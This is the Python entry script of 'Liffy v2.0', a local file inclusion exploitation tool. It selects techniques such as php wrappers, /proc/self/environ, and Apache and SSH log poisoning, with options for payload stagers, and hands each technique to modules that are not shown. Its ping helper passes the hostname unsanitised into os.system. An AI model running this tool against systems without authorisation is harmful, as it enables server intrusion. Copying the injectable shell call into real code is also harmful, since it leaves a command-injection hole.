#!/usr/bin/python import argparse import os import signal import sys import urllib.parse from pyfiglet import figlet_format from core import Expect, Filter, Input, accesslog, data, proc, sshlog from core.utils import colors def ping(hostname): """Ping the host to check if it's up or down Arguments: hostname {str} -- hostname to ping Returns: bool -- Tell if host is up or not """ resp = os.system("ping -c 1 -W2 "+hostname+" > /dev/null 2>&1") if resp == 0: return True else: return False def signal_handler(signal, frame): print(colors('\n\nYou pressed Ctrl+C!', 91)) sys.exit(0) def main(): if not len(sys.argv): print("[!] Not Enough Arguments!") # TODO: Add usage sys.exit(0) parser = argparse.ArgumentParser() parser.add_argument("url", help="URL to test for LFI") parser.add_argument("-d", "--data", help="Use data:// technique", action="store_true") parser.add_argument("-i", "--input", help="Use input:// technique", action="store_true") parser.add_argument("-e", "--expect", help="Use expect:// technique", action="store_true") parser.add_argument("-f", "--filter", help="Use filter:// technique", action="store_true") parser.add_argument("-p", "--proc", help="Use /proc/self/environ technique", action="store_true") parser.add_argument("-a", "--access", help="Apache access logs technique", action="store_true") parser.add_argument("-ns", "--nostager", help="execute payload directly, do not use stager", action="store_true") parser.add_argument("-r", "--relative", help="use path traversal sequences for attack", action="store_true") parser.add_argument("--ssh", help="SSH auth log poisoning", action="store_true") parser.add_argument("-l", "--location", help="path to target file (access log, auth log, etc.)") parser.add_argument("--cookies", help="session cookies for authentication") args = parser.parse_args() url = args.url nostager = args.nostager relative = args.relative cookies = args.cookies parsed = urllib.parse.urlsplit(url) print(colors("[~] Checking Target: {0}".format(parsed.netloc), 93)) # if ping(parsed.netloc): # print(colors("[+] Target looks alive ", 92)) # else: # print(colors("[!] Target irresponsive ", 91)) # sys.exit(1) if not parsed.query: print(colors("[!] No GET parameter Provided ", 91)) # TODO: Find a better way to do these checks if args.data: print(colors("[~] Testing with data:// ", 93)) d = data.Data(url, nostager, cookies) d.execute_data() elif args.input: print(colors("[~] Testing with input:// ", 93)) i = Input.Input(url, nostager, cookies) i.execute_input() elif args.expect: print(colors("[~] Testing with expect:// ", 93)) e = Expect.Expect(url, nostager, cookies) e.execute_expect() elif args.proc: print(colors("[~] /proc/self/environ Technique Selected!", 93)) i = proc.Environ(url, nostager, relative, cookies) i.execute_environ() elif args.access: print(colors("[~] Testing for Apache access.log poisoning", 93)) if not args.location: print(colors("[~] Log Location Not Provided! Using Default", 93)) l = '/var/log/apache2/access.log' else: l = args.location a = accesslog(url, l, nostager, relative, cookies) a.execute_logs() elif args.ssh: print(colors("[~] Testing for SSH log poisoning ", 93)) if not args.location: print(colors("[~] Log Location Not Provided! Using Default", 93)) l = '/var/log/auth.log' else: l = args.location a = sshlog.SSHLogs(url, l, relative, cookies) a.execute_ssh() elif args.filter: print(colors("[~] Testing with expect://", 93)) f = Filter.Filter(url, cookies) f.execute_filter() else: print(colors("[!] Please select atleast one technique to test", 91)) sys.exit(0) if __name__ == "__main__": signal.signal(signal.SIGINT, signal_handler) print(colors(figlet_format('Liffy v2.0', font='big'), 92)) print("\n") main()